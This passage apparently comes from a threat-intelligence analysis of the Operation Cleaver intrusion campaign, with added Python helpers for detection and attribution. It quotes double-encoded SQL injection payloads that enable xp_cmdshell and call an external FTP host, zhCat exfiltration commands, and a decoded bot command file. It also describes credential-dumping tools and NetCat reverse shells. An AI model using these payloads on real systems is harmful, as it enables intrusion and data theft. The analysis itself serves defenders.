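import struct
import uuid

# CodeView "RSDS" record layout (PDB 7.0): 4-byte signature, 16-byte GUID
# (little-endian fields), 4-byte age, NUL-terminated PDB path.
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([^\x00]{1,512})\x00", re.DOTALL)


def extract_pdb_records(blob):
    """Scan raw PE bytes for RSDS records; return [(guid_str, age, path), ...]."""
    records = []
    for m in RSDS_RE.finditer(blob):
        guid = uuid.UUID(bytes_le=m.group(1))
        age = struct.unpack("<I", m.group(2))[0]
        path = m.group(3).decode("latin-1")
        records.append((str(guid), age, path))
    return records


USER_RE = re.compile(r"[\\/]users[\\/]([^\\/]+)[\\/]", re.IGNORECASE)
PROJECT_RE = re.compile(r"[\\/]projects[\\/]([^\\/]+)[\\/]", re.IGNORECASE)


def attribute_pdb_path(path):
    """Pull the profile name, project folder (falling back to the PDB file stem),
    build configuration and the 'cleaver' keyword out of one PDB path."""
    user = USER_RE.search(path)
    project = PROJECT_RE.search(path)
    stem = re.split(r"[\\/]", path)[-1].rsplit(".", 1)[0]
    if re.search(r"[\\/]release[\\/]", path, re.IGNORECASE):
        config = "Release"
    elif re.search(r"[\\/]debug[\\/]", path, re.IGNORECASE):
        config = "Debug"
    else:
        config = None
    return {
        "user": user.group(1) if user else None,
        "project": project.group(1) if project else stem,
        "config": config,
        "mentions_cleaver": "cleaver" in path.lower(),
    }


def build_sample_pe_fragment(pdb_path, age=1):
    """Constructed: wrap a PDB path in an RSDS record between junk bytes, standing
    in for bytes read out of a real PE file. The GUID is made up."""
    guid = uuid.UUID("12345678-1234-5678-1234-567812345678")
    rec = b"RSDS" + guid.bytes_le + struct.pack("<I", age) + pdb_path.encode() + b"\x00"
    return b"\x90" * 16 + rec + b"\xcc" * 16


# PDB paths quoted in the report.
SAMPLE_PATHS = [
    r"e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb",
    r"C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\Release\BotManager.pdb",
    r"c:\Users\Jimbp\Desktop\Binder_1 - for cleaver\Binder_1\obj\x86\Release\Setup.pdb",
]


def profile_from_paths(paths):
    """Group project names by recovered user name, the first step in clustering
    samples by developer."""
    by_user = {}
    for p in paths:
        info = attribute_pdb_path(p)
        by_user.setdefault(info["user"], []).append(info["project"])
    return by_user


if __name__ == "__main__":
    blob = build_sample_pe_fragment(SAMPLE_PATHS[1], age=3)
    for guid, age, path in extract_pdb_records(blob):
        print(guid, age, path, attribute_pdb_path(path))
    print(profile_from_paths(SAMPLE_PATHS))
```

The same record is what `pefile` and `dumpbin /headers` report under the debug directory; scanning for the signature directly has the advantage of also finding records in packed or partially damaged files where the PE headers no longer point at it.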
Additional connections between team members and individuals exist but are predominantly speculative and have only been shared with law enforcement. Ultimately we believe the Cleaver team is a mix of existing team members and new recruits pulled from the universities in Iran.

TACTICS, TECHNIQUES & PROCEDURES

The Cleaver campaign used a variety of methods in multiple stages of attacks. In this section we’ll cover the commonly observed methods during different stages of the attack.

INITIAL COMPROMISE

The initial compromise gets the attackers their first foothold into the target network. Once the ability to execute arbitrary code has been established, an attacker’s job becomes quite a bit easier. Since the vector of initial compromise is usually determined by what is vulnerable on the target, we’ll cover just a few of the techniques we’ve seen Operation Cleaver use to initiate the compromise.

SQL Injection

SQL injection is a very common and simple attack method. It is made possible by a lack of input sanitization by the vulnerable application before that input is supplied to a SQL database query. SQL injection payloads used by this organization have been double encoded. Double encoding SQL injection payloads allows for bypassing of various anti-exploitation filters, such as those supplied by Web Application Firewalls (WAFs). The attackers would enable xp_cmdshell:

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20

Then connect outbound via anonymous FTP:

http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%20

Spear-Phishing Campaign

Using messaging methods such as email, attackers can social engineer users into downloading and executing software which quietly installs malware alongside the desired program. Operation Cleaver has employed this technique numerous times across different organizations.

EasyResumeCreatorPro.com

The domain EasyResumeCreatorPro.com was registered and a website set up which was a direct copy of a legitimate website at winresume.com. This is how the original site looked:

Figure 14: The original Easy Résumé Creator Pro website on winresume.com is legitimate.

That’s not all they copied. In order to infect users, they combined the original Easy Resume Creator Pro product with malware by using a binder they developed internally named Binder_1. A binder is an application which combines two executables (desired software and malware) into a single executable. The resulting executable masquerades as the desired software. The purpose is deception: to make the bound executable indistinguishable from the desired application. When executed, both applications are written to a temporary directory and executed. This way it appears that the desired application was executed, but the malware was also executed silently.

Figure 15: The fraudulent website, easyresumecreatorpro.com, is a copy of the Easy Resume Creator Pro website used to lure job candidates into downloading and installing their TinyZBot agent.

Teledyne Résumé Submitter

This attack evolved to appear more legitimate.
The attackers made the victims feel like they had a pending job opportunity at the industrial conglomerate Teledyne. In order to take advantage of this job opportunity, the victim needed to use the fake résumé submission application supplied by the malicious recruiter. Multiple domains were registered in order to make the download sites seem more realistic. These domains included other companies as they tried to hit a wider audience.
• Teledyne-Jobs.com
• Doosan-Job.com
• NorthropGrumman.net

At this point, the résumé submission application checks the Internet connection. If it is unable to connect to the Internet, it will display a window to input proxy information. When this information is entered, the results are cached in a location the dropped malware can access. After an Internet connection is ensured, the malware (TinyZBot) is dropped and executed. This clever scheme makes sure the malware can connect to the command and control server, and increases the chances that domain credentials are cached on the now infected machine. Shortly after, the main application is launched.

Figure 16: When the résumé submitting application is executed, a splash screen is displayed.
Figure 17: Unable to connect to the Internet, the tool prompts the user for proxy configuration information.
Figure 18: Final résumé submission form displays to the user while the malware runs freely in the background.

The first résumé submission form requests contact information. This form, like the rest of the submission forms, only stores the submitted information while the application is running. As the infected user is going through and filling out all this information, the malware is running in the background, logging their keystrokes, retrieving their stored passwords, etc.
Once all the forms are filled out, the user goes to the submission form. When the victim hits submit, the résumé submitter does a GET request to microsoft.com in order to make it seem like it is submitting something, then claims success. This method is particularly effective not only because of its level of deception, but also because even if the victim suspects that they are infected with malware, they are not as likely to speak up about it, as they would need to explain why they were submitting a job application to another company.

Figure 19: GET request to www.microsoft.com fakes the résumé submission.

PRIVILEGE ESCALATION & PIVOTING

Privilege escalation is a category of techniques that describe the process of going from a less privileged user on a compromised computer to a more privileged user. This increase in privileges allows the attacker to gain access to privileged areas of the operating system as well as to infect other computers on the target network. This team did not utilize any novel methods of privilege escalation, but they were observed using a variety of publicly known exploits.

PrivEsc is a compiled exploit which leverages the vulnerability commonly referred to as KiTrap0D (CVE-2010-0232). The exploit allows for escalation of privileges on unpatched Windows operating systems from an unprivileged user to kernel-level privilege. This vulnerability and the corresponding exploit were discovered and developed in 2010. The plagiarized version used in Operation Cleaver was compiled in May 2013, with a slight modification to the public source code. This modification changed the author’s details to Zhopin Exploit Team.

Pivoting is the process of leveraging access from one compromised computer in order to gain access to additional systems on the target network.
This can involve launching attacks from the compromised computer, or simply abusing access once it has been gained.

Cached Credential Dumping

A very common method of pivoting on a predominantly Windows-based network is to extract domain credentials which have been used on the compromised computer from a credential cache. There are a few well-known tools which are capable of doing this given sufficient privileges on the infected host. Two of these tools used by Cleaver are Mimikatz and Windows Credential Editor.

zhMimikatz and MimikatzWrapper

Two similar applications were developed by Operation Cleaver in order to automate the execution of Mimikatz. These applications are zhMimikatz and MimikatzWrapper. These applications store multiple versions of Mimikatz in their resources. When executed, they determine which version of Mimikatz to use based on whether the computer’s version of Windows is 32-bit or 64-bit. This technique is uncommon in malware and shows the advanced skillset of the Cleaver team. Both tools were developed in C#.

In the following examples, the computer name is TheComputerName, the username of the logged in user is TheUser, and that user’s password is ThePassword. At the time of execution, the system only has its own credentials available and no cached network credentials.

zhMimikatz

zhMimikatz executes the correct version of Mimikatz for the current system, and parses the results for any cached credentials.

Figure 20: zhMimikatz

MimikatzWrapper

Output from MimikatzWrapper is essentially the same as zhMimikatz, despite being a different Visual Studio project. The only external difference is that MimikatzWrapper also logs these results to res.txt in the executing directory.
This can make it useful for tools like the PVZ tool chain and Csext to execute with logged results:

Figure 21: The MimikatzWrapper.
Figure 22: The MimikatzWrapper dumps credentials out to a file.

PsExec Spreading

Once an attacker has credentials extracted from the cache, whether in hash form or in plaintext form, PsExec can be used to run commands on any other computer which accepts those domain credentials. If this technique is combined with cached credential dumping, it can be used to jump from computer to computer on a compromised network.

NetC (Net Crawler)

Net Crawler utilizes a cached credential dumping technique along with PsExec in order to worm throughout a network, collecting any and all credentials that it can extract from credential caches. It has the ability to do this with both Windows Credential Editor and Mimikatz. It starts by first extracting cached credentials from the infected computer’s cache. Once this is complete, it then continues to scan a set of configured IP addresses on the local subnet to determine which IP addresses have SMB related ports open. Then an iterative methodology is applied to brute forcing each SMB enabled target with each credential that was extracted from the cache. When a positive result has been achieved, it will create a copy of itself with a modified configuration stored as a PE resource, then send and execute the copy utilizing PsExec. This copy repeats the behavior of the original, but with already discovered credentials as well as newly discovered ones on the newly infected host. Any credentials found are reported back to the original infection.
The following is a sample of some of the recovered results of Net Crawler executing on a live network:

Figure 23: The real output of a successfully run NetC effort at a victim organization.

A more in-depth analysis of Net Crawler, as part of the A Study in Bots series, will be available on Cylance’s blog.

MS08-067 Exploit

MS08-067 is a vulnerability in Microsoft Windows made popular by the Conficker worm which can be exploited by a specially crafted packet to the operating system’s RPC network interface. This vulnerability has been patched since October 2008, but many networks have failed to update their systems even to this day. Operation Cleaver used a plagiarized version of a publicly available exploit for this vulnerability developed in Python. Someone in the Cleaver team (presumed to be Nesha) modified the exploit to read “By Nesha”.

Jasus

Jasus is an ARP cache poisoner developed by the Operation Cleaver team. It makes use of WinPcap and is developed in C. Compared to some other publicly available ARP cache poisoning utilities, Jasus is poorly developed and without many useful features. The primary positive attribute of Jasus is its poor detection ratio by the antivirus industry.

Cain & Abel

Cain & Abel is a publicly available toolkit which covers a wide range of functionality that assists attackers once they have compromised a node on a network. It has the ability to dump stored and cached credentials, and conduct attacks like ARP cache poisoning in order to capture credentials being transmitted on the network. It also has a remotely installable trojan named Abel, which enables some of its functionality on a remote target. We observed the Operation Cleaver team using Cain & Abel for extracting credentials from caches and the network when they are confident that there is little to no antivirus protection on the infected target.
EXFILTRATION

Exfiltration is the process of moving information to an external site. In this context, it is the process of stealing information without being detected. Operation Cleaver has a strong focus on stealing confidential/privileged information, and they have utilized a few methods in order to facilitate this objective.

Anonymous FTP Servers

Cleaver operations observed in 2013 mainly utilized FTP servers with anonymous access enabled in order to pilfer large quantities of information. This allowed them to use existing command line utilities available on their targets in order to upload information. This is a versatile technique as it does not require any additional software which could be detected. These FTP servers were also observed during the infection process, as infected computers were often instructed to download additional files from these FTP servers, including backdoors and pivoting tools. The following IP addresses hosted FTP servers that were used in the infection of targets or in the exfiltration of information.

NetCat

NetCat is a network tool which has many valid purposes but can also be used for malicious purposes. Its main functionality allows for a client and server communication channel, allowing for information to be transported over the network simply.
NetCat has an option when being compiled to enable or disable the ability for NetCat to execute a command after the connection is established. This feature can be abused to enable a reverse connecting shell, which can be used to remotely control a target. NetCat’s network communications are in plaintext, and could be viewed by an egress filter looking to block the exfiltration of sensitive information. The Operation Cleaver team was observed attempting to use NetCat to exfiltrate information as well as use it as a reverse connecting shell. The use of NetCat was later replaced with zhCat.

zhCat

zhCat is a tool developed by the Operation Cleaver team which operates similarly to NetCat. Its main purpose is to create a channel that is capable of transporting information over the network. The changes made in zhCat allow for this information to be transferred with inline obfuscation and/or encryption. This makes it more difficult to detect that privileged information is being exfiltrated. The command line help (of a particular version) shows the following options:

Multiple obfuscation/encryption methods are available. The -h argument enables HTTP mode. This makes the traffic between zhCat instances look like benign HTTP traffic. For instance, if the attackers set up a zhCat instance listening on port 1000 on 192.168.116.128 in HTTP mode, the client instance of zhCat would use the following command:

zhcat.exe -h -p 1000 -i 192.168.116.128

The server instance would use the following command:

zhcat.exe -l -h -p 1000

When we run both of these, we can send information just by typing it into the terminal of the running application. Information can be supplied by standard input.
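As an added illustration (not part of the report and not zhCat’s code) of how a defender could triage captured POST bodies from zhCat’s HTTP mode, the helper below tests whether a body reads as plaintext or decodes to plaintext under the XOR key the report quotes later in this section. It assumes the -x mode is a repeating-key XOR with that key, which the report does not specify, and the sample body is constructed here.

```python
"""Triage helper for zhCat-style HTTP-mode payloads (added example).

Assumption: zhCat's -x option applies a repeating-key XOR with the key quoted
in the report. The report gives the key but not the exact scheme, so this is
a heuristic check for analysts, not a reimplementation of the tool.
"""
from itertools import cycle
from typing import Optional, Tuple

# XOR key quoted in the report: the message text twice, joined by a newline.
ZHCAT_XOR_KEY = (
    b"Sorry! The handle to file %s is not a valid handle any more.\n"
    b"Sorry! The handle to file %s is not a valid handle any more."
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or tab/newline/carriage return."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def try_decode_zhcat(body: bytes, threshold: float = 0.95) -> Optional[Tuple[str, str]]:
    """Classify a captured body.

    Returns ("xor", text) if the body becomes mostly printable under the known
    key, ("plaintext", text) if it is readable as-is (zhCat without -x sends
    plaintext), or None if neither holds. The XOR test runs first because a
    XOR-obfuscated body can itself contain a fair number of printable bytes.
    """
    decoded = xor_repeating(body, ZHCAT_XOR_KEY)
    if printable_ratio(decoded) >= threshold:
        return ("xor", decoded.decode("ascii", errors="replace"))
    if printable_ratio(body) >= threshold:
        return ("plaintext", body.decode("ascii", errors="replace"))
    return None


# Constructed sample: a short exfiltrated line as it would look after
# zhCat obfuscated it (built here with the same repeating-key XOR).
SAMPLE_MESSAGE = b"user=jdoe\r\npass=Winter2014!\r\n"
SAMPLE_BODY = xor_repeating(SAMPLE_MESSAGE, ZHCAT_XOR_KEY)

if __name__ == "__main__":
    print(try_decode_zhcat(SAMPLE_BODY))
    print(try_decode_zhcat(b"hello world\n"))
    print(try_decode_zhcat(b"\x00\xff\x80\x81"))
```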
If we observe the network communications during this transfer, we can see the following HTTP POST request.

Note: research into ebizmba.com did not turn up any additional evidence of it being involved with the development of zhCat.

On the server side, we can see our message has been received:

If stricter egress filtering is enabled, the attackers can use zhCat to also XOR encrypt the traffic with a shared key. These keys are stored inside zhCat. The following is the key used for XOR encryption:

Sorry! The handle to file %s is not a valid handle any more.\nSorry! The handle to file %s is not a valid handle any more.

The \n represents hex character 0x0A, which is a new line character. An attacker could set up a server instance of zhCat with the following command in order to enable both HTTP and XOR obfuscation:

zhcat.exe -h -p 1000 -l -x

The client instance could then be invoked with the following command:

zhcat.exe -h -p 1000 -i 192.168.116.128 -x

Once again, information can be supplied via standard input. Upon inspecting the network traffic again, we see the following HTTP POST request. On the server side, we can see this information being received:

zhCat has a variety of other features such as port mirroring as well as traffic redirecting.

PLink

PLink is one of the many utilities provided in the PuTTY (SSH) suite, which has many benign purposes. It is capable of communicating over various protocols, the most notable being SSH. The SSH protocol is a heavily utilized encrypted protocol, most commonly used for remote administration of UNIX based operating systems. PLink is designed to implement some of the SSH functions related to forwarding traffic as well as other functionality. Operation Cleaver uses PLink to forward local RDP ports to remote SSH servers.
This allows them to easily connect to RDP servers inside the networks of their victims. These RDP connections can be used to exfiltrate information visually, as well as to remotely control the computers hosting the RDP servers.

SMTP

Early Cleaver operations abused SMTP in order to exfiltrate information. The sending is performed by internally developed malware samples such as TinyZBot and Csext in order to exfiltrate information about the infected computer, as well as requested files and keystroke logging information. Messages were sent using an open SMTP relay at BeyondSys.com with the sender email address dyanachear(at)beyondsys.com. This allowed the attackers to use infrastructure that was not theirs to exfiltrate information. The known recipient addresses of this information were testmail_00001(at)yahoo.com and TerafficAnalyzer(at)yahoo.com. In order to deceive anyone reading these emails, they made them appear to be a spam message that most would not think twice about. The subject used is the following:

No Prescription required. Viagra Dosages: 25, 100, 150mg. Fast worldwide delivery.

The message used is the following:

Buy Viagra150mg x 50 tablets for only $124.99! No Prescription required. Viagra dosages: 150, 100, 25mg. Fast Worldwide Delivery. See the attachment movie. Free bonus trip. bestviagra4u.cn

The files being exfiltrated are added to the email as attachments.

SOAP

SOAP is a sub-protocol communicated via HTTP. In relation to Operation Cleaver, it is used as the command and control protocol for TinyZBot, which was the preferred backdoor, and underwent long-term development. HTTP communications are often used by botnets, but it is uncommon to use a sub-protocol such as SOAP. It is likely that SOAP was used because it is simple to implement in C#, and has the added benefit of blending in with other benign HTTP traffic.
As part of TinyZBot’s command and control protocol, files can be exfiltrated over SOAP to the command and control server. For more information about TinyZBot, see the Persistence section.

PERSISTENCE

Persistence is the means of maintaining access to a compromised network. There are limitless methods of persistence; the following are techniques and tools for persistence used by Cleaver.

TinyZBot

TinyZBot is a backdoor developed in C#. This bot is the longest developed malware we have analyzed from this organization. The earliest known version was compiled in January 2013 and we continued to see new versions being created actively. The purpose of TinyZBot is to gather information from an infected computer as well as maintain and further access into a compromised network. TinyZBot was developed with the clear intention of targeted campaigns. The name TinyZBot is assumed to be referring to this project as a less versatile version of the ZeuS botnet, although it does not exhibit the major browser injection features of ZeuS. To be clear, TinyZBot shares no code with ZeuS or its variants, and is developed in a different programming language. The majority of the code in TinyZBot was created by Cleaver.

TinyZBot Features

TinyZBot supports a wide array of features that continually evolved over time. For the evolution of features, see the History section.
The following is a list of supported features:
• SMTP exfiltration
• Log keystrokes
• Monitor clipboard activity
• Enable a SOAP-based command and control channel
• Self-updating
• Download and execute arbitrary code
• Capture screenshots
• Extract saved passwords for Internet Explorer
• Install as a service
• Establish persistence by shortcut in startup folder
• Provide unique malware campaign identifiers for tracking and control purposes
• Deceptive execution methods
• Dynamic backdoor configuration
• FTP exfiltration
• Security software detection
• Ability to disable Avira antivirus
• Ability to modify PE resources
• Dynamic plugin structure

TinyZBot Command and Control Protocol

The command and control mechanism for TinyZBot utilizes SOAP communicating over HTTP. Potential reasons for using SOAP are:
1. SOAP-based communications are simple to implement in C#.
2. SOAP traffic could easily be considered benign traffic, as it is not commonly seen in malware.

As part of SOAP communications, a URI is specified. This is internal to the sub-protocol, and does not necessarily reflect the URI of the host running the SOAP server (ASMX file). In the case of TinyZBot, and many examples for developing SOAP applications, this URI is tempuri.org.

Since the first version of the SOAP-based command and control protocol was implemented, TinyZBot has used what is referred to as a “dynamic password”. This is a cryptographically hashed version of the server time (which must be obtained through a SOAP query), the TinyZBot’s GUID, and the TinyZBot’s AppUsageID (campaign identifier).
For the command and control examples below, red text represents TCP data sent from the TinyZBot infection while blue text represents TCP data sent from the command and control server. The server time lookup query invokes the SOAP command GetServerTime.

POST /checkupdate.asmx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri(dot)org/GetServerTime"
Host: microsoftactiveservices(dot)com
Content-Length: 291
Expect: 100-continue
Connection: Keep-Alive

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 06 Oct 2014 13:36:47 GMT
Content-Length: 392

2014-10-06T13:36:47.2193601Z GetServerTimeResponse>

This is the first query done by a running TinyZBot instance, and needs to be done shortly before most other queries, in order to update the dynamic password. Commands, updates and files to drop and execute are stored as files on the SOAP server, and access is restricted by the AppUsageID as well as the bot GUID. This allows for commands to be sent to all bots for a campaign as well as individual control. The TinyZBot queries the server in order to enumerate all files currently available to it.
POST /checkupdate.asmx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri(dot)org/GetFileList"
Host: microsoftactiveservices(dot)com
Content-Length: 425
Expect: 100-continue

HTTP/1.1 100 Continue

00cf6217-8c7e-4598-b155-65ebd949bba9 XYZCO abefc81 BDFF;1.0.0 Version>

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 06 Oct 2014 13:36:47 GMT
Content-Length: 1474

[ALL]__b93c-49a1-140914084450__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084612__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084619__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084628__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084638__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084644__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084659__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084715__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084732__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914084741__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140914090807__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140915103605__[00000000000000000000000000000000].tmu
[ALL]__b93c-49a1-140915103610__[00000000000000000000000000000000].tmu
GetFileListResult>

In order to download the file and parse it for commands to execute, the TinyZBot must request the file. The file is downloaded Base64-encoded inside of the SOAP response.
POST /checkupdate.asmx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri(dot)org/GetFile"
Host: microsoftactiveservices(dot)com
Content-Length: 478
Expect: 100-continue

HTTP/1.1 100 Continue

00cf6217-8c7e-4598-b155-65ebd949bba9 Id>XYZCO abefc81 [ALL]__b93c-49a1-140914084450__[00000000000000000000000000000000].tmu

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 06 Oct 2014 13:36:47 GMT
Content-Length: 652

OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgPj4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KVVBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMRVRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA==

The command file downloaded in this example is as follows:

;20140914__084450
RUNCMD=cmd.exe,/C ipconfig /all >> "[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt" 2>&1
UPLOAD=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt
DELETE=[INFOLDER]\d2db696a-3367-4699-a815-df09098bc596.txt

The first line is a timestamp of the command. The TinyZBot command parser ignores it. The RUNCMD line requests that cmd.exe be executed, with the output of the command ipconfig /all being redirected to a file in a directory designated for files to be uploaded. The UPLOAD command requests that this file is then uploaded over SOAP to the command and control server. The DELETE command then requests that the file be deleted from the infected system.
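The following is an added triage helper, not code from the report or from TinyZBot, for the SOAP command and control exchange and command file format described above: it flags HTTP request heads that match the documented pattern (POST to an .asmx endpoint, SOAPAction under tempuri.org, one of the five SOAP methods the report lists) and decodes the Base64 body of a GetFile response into its ";timestamp / KEY=VALUE" commands. The sample request, host name and command file are constructed for this example.

```python
"""Triage helpers for TinyZBot-style SOAP command and control traffic.

Added example, not code from the Operation Cleaver report or from TinyZBot.
Sample request head and command file below are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# SOAP methods the report lists for TinyZBot's command and control server.
TINYZBOT_SOAP_METHODS = {"CheckFileMD5", "GetFile", "GetFileList",
                         "GetServerTime", "UploadFile"}
# User-Agent fragment seen in the report's captures (.NET web services client).
DOTNET_WS_UA = "MS Web Services Client Protocol"

REQUEST_LINE_RE = re.compile(r"^POST\s+(\S+\.asmx)\s+HTTP/1\.[01]", re.I)
SOAPACTION_RE = re.compile(r'^SOAPAction:\s*"?https?://tempuri\.org/(\w+)"?',
                           re.I | re.M)
HOST_RE = re.compile(r"^Host:\s*(\S+)", re.I | re.M)


def classify_request(raw_request: str) -> Optional[dict]:
    """Return a finding for a TinyZBot-like SOAP request head, else None."""
    lines = raw_request.splitlines()
    if not lines:
        return None
    m = REQUEST_LINE_RE.match(lines[0])
    if not m:
        return None
    action = SOAPACTION_RE.search(raw_request)
    if not action or action.group(1) not in TINYZBOT_SOAP_METHODS:
        return None
    host = HOST_RE.search(raw_request)
    return {
        "endpoint": m.group(1),
        "method": action.group(1),
        "host": host.group(1) if host else "",
        "dotnet_ws_client": DOTNET_WS_UA in raw_request,
    }


@dataclass
class BotCommand:
    name: str          # e.g. RUNCMD, UPLOAD, DELETE
    args: List[str]    # RUNCMD carries [executable, arguments]; others one value


def parse_command_file(text: str) -> List[BotCommand]:
    """Parse the command file format: lines starting with ';' are timestamps
    and are ignored, other lines are KEY=VALUE, and a RUNCMD value is
    "executable,arguments" (split on the first comma only)."""
    commands = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        name, sep, value = line.partition("=")
        if not sep:
            continue
        if name == "RUNCMD":
            exe, _, args = value.partition(",")
            commands.append(BotCommand(name, [exe, args]))
        else:
            commands.append(BotCommand(name, [value]))
    return commands


def decode_getfile_payload(b64_body: str) -> List[BotCommand]:
    """Decode the Base64 file carried in a GetFile response and parse it."""
    raw = base64.b64decode("".join(b64_body.split()))
    return parse_command_file(raw.decode("utf-8", errors="replace"))


# Constructed sample: a GetFile request head in the shape the report shows;
# the host name is a placeholder, not one from the report.
SAMPLE_REQUEST = (
    "POST /checkupdate.asmx HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "http://tempuri.org/GetFile"\r\n'
    "Host: c2.example.invalid\r\n"
)

# Constructed command file in the format the report decodes.
SAMPLE_COMMAND_FILE = (
    ";20140914__084450\r\n"
    'RUNCMD=cmd.exe,/C ipconfig /all >> "[INFOLDER]\\out.txt" 2>&1\r\n'
    "UPLOAD=[INFOLDER]\\out.txt\r\n"
    "DELETE=[INFOLDER]\\out.txt\r\n"
)
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_COMMAND_FILE.encode()).decode()

if __name__ == "__main__":
    print(classify_request(SAMPLE_REQUEST))
    for cmd in decode_getfile_payload(SAMPLE_PAYLOAD):
        print(cmd.name, cmd.args)
```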
The following is a list of supported commands that TinyZBot responds to:
KILL
DEEPKILL
EXIT
EXITFORCE
RUNAVDETECTOR
RUNWAIT
RUNCMD
UCMD
GETINFO
GETSCREENSHOTHQ
GETSCREENSHOT
CREATEUPLOADLIST
FORCERESTART
FORCEEXIT
UNLOADMODULE
RELOADMODULE
LOADMODULE
UNLOADM
RELOADM
REMOVEM
UNLOADALL
RELOADALL
ADDSEC
REMSEC
ADDKV
CHGKV
REMKV
ADDK
REMOVEK
COPY
REPLACE
DELETE
UPLOAD
FUPLOAD
CLEARFILES
CLEAROUPUTFOLDER
SAVECONFIG
SAVETOCFGFILE
RESTART
RestartForce

Commands such as GETINFO are often run on newly infected systems, as the attackers decide whether the infection has hit the correct target. There are additional SOAP commands, but they will not be covered in detail. The following is a list of all the SOAP commands: CheckFileMD5, GetFile, GetFileList, GetServerTime, UploadFile.

Deception

TinyZBot is commonly installed using some form of deception. Recent versions use the résumé-based methods reported in the Initial Compromise section. An additional method was used for earlier versions. When early versions of TinyZBot were executed, they opened an image stored in the resource section of the executable and copied the malicious TinyZBot executable to the %AppData% directory. Many of the images identified were of the popular Lebanese singer and actress Haifa Wehbe. The backdoor additionally replaced the original malicious executable with an appropriately named image file and padded the image file with null bytes in order to mirror the original file size.

History

The earliest known version of TinyZBot was compiled on January 27, 2013. This early version had very little functionality. It was limited to logging keystroke data, sending emails, and creating a link in the user’s startup folder for persistence. Its method of exfiltrating the logged keystrokes relied upon a hardcoded email address stored in the binary.
The sender email address was dyanachear(at)beyondsys.com and emails were destined for testmail_00001(at)yahoo.com. The message was intended to look like common Viagra spam from China, but would be sent with the keystroke logging data as attachments, as well as system information. The initial version did not provide any means of receiving commands and was obfuscated with SmartAssembly.

The following iteration, compiled on March 12, 2013, only contained minor bug fixes.

The next version was compiled on April 24, 2013. This version starts to look more like an average bot. A command and control protocol was established, using HTTP and SOAP for the protocol. The command and control server for this version was located at 173.192.144.68/DefaultWS(dot)asmx. This new command and control protocol allowed for the addition of quite a few other features. An update mechanism was added, and could be regularly scheduled, so unassisted periodic update checks were automatically performed. The SOAP API used a dynamic password mechanism, which required the computation of a simple key in order to access certain parts of the API. The email data exfiltration method also underwent modification to be activated at a scheduled interval. There were also some changes which looked to be bug fixes, such as limiting the number of times sending an email could fail.

The next day, April 25, 2013, a new version was compiled which allowed for self-deletion.

